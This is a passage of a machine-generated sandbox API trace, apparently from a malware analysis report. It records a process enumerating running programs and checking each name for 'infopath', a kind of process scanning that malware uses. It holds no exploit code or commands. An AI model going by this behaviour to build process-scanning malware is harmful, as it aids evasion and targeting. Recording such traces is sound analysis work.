(uFlags=0x40, uBytes=0xd) returned 0x3577de0 [0096.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3577de0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0096.772] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0096.772] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="infopath") returned 0x0 [0096.772] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0096.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.773] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577c78 [0096.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x3577c78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0096.773] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0096.773] StrStrIA (lpFirst="pending.exe", lpSrch="infopath") returned 0x0 [0096.773] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0096.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0096.775] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356b230 [0096.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x356b230, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0096.775] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0096.775] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="infopath") returned 0x0 [0096.775] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0096.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0096.776] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3575160 [0096.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x3575160, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0096.776] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0096.776] StrStrIA (lpFirst="swing prefer.exe", lpSrch="infopath") returned 0x0 [0096.776] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0096.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0096.778] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356ae70 [0096.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x356ae70, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0096.778] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0096.778] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="infopath") returned 0x0 [0096.778] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0096.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0096.779] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35751a0 [0096.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x35751a0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0096.779] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0096.779] StrStrIA (lpFirst="nights-attending.exe", lpSrch="infopath") returned 0x0 [0096.779] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0096.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.780] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3577c18 [0096.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x3577c18, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0096.781] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0096.781] StrStrIA (lpFirst="installed.exe", lpSrch="infopath") returned 0x0 [0096.781] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0096.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0096.782] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356aee8 [0096.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x356aee8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0096.782] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0096.782] StrStrIA (lpFirst="references compounds.exe", lpSrch="infopath") returned 0x0 [0096.782] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0096.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0096.783] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3575200 [0096.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x3575200, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0096.784] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0096.784] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="infopath") returned 0x0 [0096.801] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0096.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0096.803] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3575220 [0096.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x3575220, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0096.803] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0096.803] StrStrIA (lpFirst="registered try.exe", lpSrch="infopath") returned 0x0 [0096.803] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0096.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0096.804] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356b258 [0096.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x356b258, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0096.804] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0096.804] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="infopath") returned 0x0 [0096.805] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0096.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.806] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3577bd0 [0096.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x3577bd0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0096.806] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0096.806] StrStrIA (lpFirst="invite.exe", lpSrch="infopath") returned 0x0 [0096.806] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0096.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0096.807] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3577c30 [0096.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x3577c30, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0096.807] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0096.807] StrStrIA (lpFirst="idol.exe", lpSrch="infopath") returned 0x0 [0096.807] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0096.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0096.809] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356b5f0 [0096.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x356b5f0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0096.809] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0096.809] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="infopath") returned 0x0 [0096.809] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0096.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0096.810] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356b7d0 [0096.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x356b7d0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0096.810] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0096.810] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="infopath") returned 0x0 [0096.811] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0096.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0096.812] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3577c90 [0096.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x3577c90, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0096.812] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0096.812] StrStrIA (lpFirst="powell_jane.exe", lpSrch="infopath") returned 0x0 [0096.812] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0096.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0096.813] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3575240 [0096.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x3575240, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0096.814] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0096.814] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="infopath") returned 0x0 [0096.814] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0096.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0096.817] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3577e28 [0096.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x3577e28, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0096.817] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0096.817] StrStrIA (lpFirst="gainedshape.exe", lpSrch="infopath") returned 0x0 [0096.817] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0096.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0096.819] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35755e0 [0096.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x35755e0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0096.819] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0096.819] StrStrIA (lpFirst="opens-versions.exe", lpSrch="infopath") returned 0x0 [0096.819] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0096.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0096.821] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356b550 [0096.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x356b550, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0096.821] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0096.821] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="infopath") returned 0x0 [0096.821] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0096.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.822] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3577ba0 [0096.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x3577ba0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0096.823] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0096.823] StrStrIA (lpFirst="3dftp.exe", lpSrch="infopath") returned 0x0 [0096.823] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0096.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0096.824] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35756a0 [0096.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x35756a0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0096.824] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0096.824] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="infopath") returned 0x0 [0096.824] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0096.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.826] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3577cc0 [0096.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x3577cc0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0096.826] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0096.826] StrStrIA (lpFirst="alftp.exe", lpSrch="infopath") returned 0x0 [0096.826] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, 